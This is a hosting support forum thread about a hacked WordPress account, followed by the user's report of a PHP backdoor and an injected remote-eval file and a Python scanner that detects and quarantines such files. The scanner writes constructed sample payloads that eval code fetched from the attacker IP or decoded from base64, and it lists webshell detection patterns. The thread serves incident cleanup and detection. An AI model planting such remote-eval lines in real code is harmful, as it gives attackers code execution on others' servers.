
Posted

Hello, I'm on the Morty plan and I got an email from you yesterday saying that one of my sites that uses WordPress was hacked, and so my entire account has been suspended.

I would like to request that my account be unsuspended, as I have many other sites on it which are not affected and which rely on being online.
I would appreciate it if the particular affected site is preferably brought down for maintenance, but all my other sites, which have been carefully curated and such, are left as they were.

I look forward to your speedy intervention. I would also like to ask if, in future, it's possible in such cases for the specific site to be suspended instead of the entire account.

Thanks.


Posted

Our policy is typically to require the entire account be reset without a backup to destroy the contents before you can recover a hacked account (in case phishing or similar was set up and stolen information is present), though after looking through your account I don't see anything suspicious outside of the one domain that was compromised (lda.ng). 

Are you OK with deleting the contents of the domain lda.ng and the associated WP database to be unsuspended?

Posted

Wow, please don't reset, as I haven't performed a full backup. I am okay with clearing/deleting the contents of the lda domain etc. for it to be unsuspended. Once restored, I will create a full backup of the entire account so that I can avoid any major losses going forward.
I would appreciate it if you can kindly point me to an article/guide on how to do a holistic backup of the whole account so I can reduce my exposure.
Also, any further information on how this attack was perpetrated/what exactly was affected will go a long way. Thanks!

Posted

The contents of the domain lda.ng have been discarded, the associated WP database developer1_lda has been dropped, and you've been unsuspended. Your account may take up to 2 hours to function fully. The attack came in through WordPress itself, which is usually either a result of plugins with vulnerabilities or a failure to install updates.

A backup from February actually does exist for your account at https://heliohost.org/backup/ if you need anything from that timeframe.

You can make backups using the backup tool in Plesk. Note that if you use this, it is advised that you configure remote storage, as the backups it creates count towards your disk space quota and can quickly cause you to run out of space.

Posted

Hi Wolstech,

Following up on this thread; wanted to flag something I found while cleaning up after the recent incident, in case it's useful for your records.

While reviewing my ngo.helioho.st site (a separate, non-WordPress domain on this account) I found two files that don't belong there: a heavily obfuscated backdoor named mac.php (last modified June 11, ~7:49 PM), and an injected index.php containing a remote-eval payload pulling from 63.141.235.34, plus a redirect to a suspicious shortened link, swiy.co/goodrich555 (modified June 13, ~7:07–7:12 AM). Both timestamps are before your review where you mentioned nothing looked suspicious outside lda.ng, so this looks like it's from the same intrusion window, just on a domain that isn't WordPress and may not have been part of that check.

Tried backing up existing WP installs like ths.helioho, but I encounter Host Build interrupts due to things like allowed runtime and PHP max execution.

I've already renamed both files to .infected to disable them and remove them from execution, and I'm restoring a clean copy of that site myself. I'm not asking for another account-wide reset; this is contained and I'm handling it. But since I don't have shell access to search file contents across the rest of the account, and since this looks like leftover from the same incident rather than a new one, I wanted to flag it rather than sit on it. Would it be possible to do a targeted check for similar files on my other domains rather than a full account reset, since the rest of the account otherwise appears unaffected? Happy to send over the exact file contents if that helps your scan.

Thanks again for the help.
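A targeted check of the kind asked for in the post above, as an added example that is not from this thread or from HelioHost: a small Python scanner that walks a web root, flags PHP files matching the behaviours described above (eval of remote content, eval of decoded/obfuscated data, a Location redirect, a long encoded blob) plus the specific indicators quoted in the thread (the 63.141.235.34 host, the swiy.co/goodrich555 redirect, the xtamdxsirm string), and can rename the hits to .infected the way the poster did by hand. The sample web root it builds in a temp directory is constructed for the demonstration and is not the real mac.php or index.php; the pattern list is an assumption, a set of common webshell idioms rather than a complete ruleset, so a shell that avoids them will not be flagged.

```python
"""Heuristic scan of a web root for injected PHP like the files described above."""
from __future__ import annotations

import os
import re
import sys
import tempfile
from pathlib import Path

# Indicators quoted in the thread: the IP the injected index.php pulled from,
# the shortened redirect target, and the string seen at the top of mac.php /
# bless24.php. Extend this list with whatever the host's own scan turns up.
KNOWN_IOCS = ["63.141.235.34", "swiy.co/goodrich555", "xtamdxsirm"]

# Generic webshell / injection idioms. Assumption: these are heuristics only;
# a shell that avoids these constructs will not be flagged.
PATTERNS = {
    "remote_eval": re.compile(r"eval\s*\(\s*(?:file_get_contents|curl_exec|fopen)\b", re.I),
    "obfuscated_eval": re.compile(
        r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I),
    "remote_url_to_ip": re.compile(r"https?://\d{1,3}(?:\.\d{1,3}){3}", re.I),
    "location_redirect": re.compile(r"header\s*\(\s*['\"]Location:", re.I),
    "long_encoded_blob": re.compile(r"['\"][A-Za-z0-9+/=]{200,}['\"]"),
}
PHP_EXTS = (".php", ".phtml", ".php5", ".php7", ".inc")


def scan_file(path: Path) -> list[str]:
    """Return the names of every pattern and IOC that matches this file."""
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return []
    hits = [name for name, rx in PATTERNS.items() if rx.search(text)]
    hits += [f"ioc:{ioc}" for ioc in KNOWN_IOCS if ioc in text]
    return hits


def scan_tree(root: Path) -> dict[str, list[str]]:
    """Map each flagged PHP file (path relative to root) to its hits."""
    findings: dict[str, list[str]] = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = Path(dirpath) / name
            if path.suffix.lower() not in PHP_EXTS:
                continue
            hits = scan_file(path)
            if hits:
                findings[path.relative_to(root).as_posix()] = hits
    return findings


def quarantine(root: Path, findings: dict[str, list[str]]) -> list[str]:
    """Rename flagged files to <name>.infected so the web server no longer
    treats them as PHP (the manual step the poster took); returns new names."""
    renamed = []
    for rel in findings:
        src = root / rel
        dst = src.with_name(src.name + ".infected")
        src.rename(dst)
        renamed.append(dst.relative_to(root).as_posix())
    return renamed


def build_sample_tree() -> Path:
    """Constructed sample web root for the demo; NOT the real files from the thread."""
    root = Path(tempfile.mkdtemp(prefix="webroot-"))
    (root / "clean").mkdir()
    (root / "ngo").mkdir()
    (root / "clean" / "index.php").write_text("<?php\necho 'hello';\n")
    # Constructed stand-in for an injected index.php: remote eval plus redirect.
    (root / "ngo" / "index.php").write_text(
        "<?php\n"
        "eval(file_get_contents('http://63.141.235.34/p.txt'));\n"
        "header('Location: https://swiy.co/goodrich555');\n"
    )
    # Constructed stand-in for an obfuscated backdoor: long blob, decoded then eval'd.
    (root / "ngo" / "mac.php").write_text(
        "<?php\n$xtamdxsirm = '" + "QUJD" * 60 + "';\n"
        "eval(base64_decode($xtamdxsirm));\n"
    )
    (root / "ngo" / "app.js").write_text("console.log('not scanned');\n")
    return root


if __name__ == "__main__":
    target = Path(sys.argv[1]) if len(sys.argv) > 1 else build_sample_tree()
    for rel, hits in sorted(scan_tree(target).items()):
        print(f"{rel}: {', '.join(hits)}")
```

Run it with the path of your web root as the only argument (with no argument it scans the constructed sample tree). Review each hit before calling quarantine: a Location redirect or a long string on its own is normal in plenty of legitimate code, and a rename only stops the server treating the file as PHP, so keep the .infected copy for the host to look at and delete it once they have.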

Posted

"non-WordPress domain on this account)"

That's why I missed it... that domain has Node instead. When I went through the domains, I saw that one had Node enabled and just skipped over it, as I was focused on the WP stuff. The good news is that those files, while definitely malicious, likely would not have been able to run anyway since you had Node enabled (Passenger redirects everything to Node when it is enabled on a domain, so Apache never gets to run the PHP files).

The interesting part is that the index.php is clearly meant for a nonexistent WP on that domain, and the mac.php looks like it may be the same or a very similar file to a file called bless24.php that was on the compromised lda.ng domain (I recognize this string from the top: xtamdxsirm from the other day).
